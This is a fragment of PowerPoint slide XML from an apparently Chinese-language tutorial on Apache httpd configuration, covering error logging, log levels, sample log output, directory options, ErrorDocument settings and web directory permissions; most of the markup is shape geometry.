                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="397763" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397763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07744" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1007744" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1007363" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1007363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363" y="1764792"/>
            <a:ext cx="10787380" cy="1478280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10787380" h="1478280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10786872" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10786872" y="1478279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147827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2334" y="1760232"/>
            <a:ext cx="10797540" cy="1487170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="10792269" y="1486852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1486852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1485938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1484883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079703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477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796790" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796117" y="1484883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10795063" y="1485938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10793742" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="1486852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="148717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797540" h="1487170">
                <a:moveTo>
                  <a:pt x="1078750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787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="10787507" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="10797032" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="9525" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="10787507" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="1487170">
                <a:moveTo>
                  <a:pt x="10797032" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="1482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3" y="3409188"/>
            <a:ext cx="10787380" cy="3139440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10787380" h="3139440">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10786872" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10786872" y="3139440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3139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2334" y="3404857"/>
            <a:ext cx="10797540" cy="3148965"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10792269" y="3148838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3148838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3148609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3147936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="3146882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3145548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3144075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079703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139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3144075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796790" y="3145548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796117" y="3146882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10795063" y="3147936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10793742" y="3148609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3148838"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="314896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797540" h="3148965">
                <a:moveTo>
                  <a:pt x="1078750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787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10787507" y="3144075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10797032" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="9525" y="3144075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10787507" y="3144075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10797032" y="3144075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3139313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="31440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8281" y="1309623"/>
            <a:ext cx="11166475" cy="51650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error_log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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ErrorLog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"logs/error_log"</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="37026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LogLevel: Control the number of messages logged to the error_log.  </a:t>
            </a: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Possible values include: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>debug, info, notice, warn, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>error,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crit,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b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alert,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emerg.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#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LogLevel warn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553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[Sun May 28 20:58:44.570146 2017] [lbmethod_heartbeat:notice] [pid 13802] AH02282: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>slotmem  from mod_heartmonitor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[Sun May 28 20:58:44.599330 2017] [mpm_prefork:notice] [pid 13802] AH00163: Apache/2.4.6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(CentOS)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PHP/7.1.5 configured </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resuming normal operations</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="1409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[Sun May 28 20:58:44.599354 2017] [core:notice] [pid 13802] AH00094: Command line: '/usr/sbin/httpd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-  D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> FOREGROUND'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[Sun May 28 20:58:47.072940 2017] [php7:notice] [pid 13803] [client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192.168.44.1:54363]</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="32639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{"reqId":"WSrJh-aHzOTfSv2OaPAWUwAAAAA","level":3,"time":"2017-05-  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>28T12:58:47+00:00","remoteAddr":"192.168.44.1","user":"-</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="30670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-","app":"PHP","method":"GET","url":"\\/index.php","message":"touch(): Utime failed: Permission denied  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\\/var\\/www\\/secloud\\/lib\\/private\\/Config.php#240"}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2147" y="3811270"/>
            <a:ext cx="340360" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="340359" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="339851" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33985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4640580" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4640580" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4640580" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464058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851" y="1597723"/>
            <a:ext cx="3721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禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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服务器列表显示文件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51" y="3604323"/>
            <a:ext cx="394970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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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服务器错误页面重定向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.htaccess)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0579" y="1673351"/>
            <a:ext cx="4615180" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4615180" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4614672" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4614672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6096" y="1668487"/>
            <a:ext cx="4624705" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4624705" h="1764029">
                <a:moveTo>
                  <a:pt x="4619840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68" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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4619840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462460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4624603" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624362" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4623688" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4622634" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4621314" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705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624705" h="1764029">
                <a:moveTo>
                  <a:pt x="461507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615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="1764029">
                <a:moveTo>
                  <a:pt x="4615078" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="1764029">
                <a:moveTo>
                  <a:pt x="4624603" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705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4624705" h="1764029">
                <a:moveTo>
                  <a:pt x="4615078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4615078" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="1764029">
                <a:moveTo>
                  <a:pt x="4624603" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603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40579" y="1694840"/>
            <a:ext cx="461518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1493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&lt;Directory "/var/www/htdocs"&gt;  Options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Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FollowSymLinks  AllowOverrride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  <a:p>
            <a:pPr marL="91440" marR="28003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Order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allow,deny  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Allow 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&lt;/Directory&gt;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0579" y="3587496"/>
            <a:ext cx="7211695" cy="2308860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7211695" h="2308860">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7211568" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211568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6096" y="3583216"/>
            <a:ext cx="7221220" cy="2318385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="7216381" y="2317838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2317838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2314549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2313076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7216381" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722114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308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="2313076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7220902" y="2314549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7220229" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7219175" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7217854" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7216381" y="2317838"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="231838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221220" h="2318385">
                <a:moveTo>
                  <a:pt x="721161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211618" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211618" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="7211618" y="2313076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7211618" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7216381" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7216381" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211618" y="2313076"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="7221143" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7216381" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211618" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="9525" y="2313076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313076"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="7211618" y="2313076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211618" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211618" y="2313076"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7221220" h="2318385">
                <a:moveTo>
                  <a:pt x="7221143" y="2313076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7211618" y="2313076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7216381" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="2308313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7221143" y="231307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40579" y="3609568"/>
            <a:ext cx="721169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625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Customizable error responses come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three flavors:  </a:t>
            </a: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1) plain text 2) local redirects 3) external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redirects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Some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marL="91440" marR="189483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#ErrorDocument 500 "The server made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boo boo."  #ErrorDocument 404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/missing.html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#ErrorDocument 404 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"/cgi-bin/missing_handler.pl"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#ErrorDocument 402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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.example.com/subscription_info.html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9851" y="1597723"/>
            <a:ext cx="826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6725920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目录的读写权限，脚本执行权限的方法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User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800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	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Group</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800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50" y="1997773"/>
            <a:ext cx="47703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首先设定网站目录和文件的所有者和所有组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51" y="2674684"/>
            <a:ext cx="3111500" cy="84151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设置网站目录权限为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75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设置网站文件权限为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64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50" y="4005643"/>
            <a:ext cx="35511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针对个别目录设置可写权限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35167" y="2043683"/>
            <a:ext cx="5473065" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5473065" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5472684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5472684" y="368808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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0900" y="2038883"/>
            <a:ext cx="5481955" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="547662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39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376885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5476621" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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5481383" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481154" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5480481" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5479427" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5478094" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="37909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481955" h="379094">
                <a:moveTo>
                  <a:pt x="547185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471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5471858" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
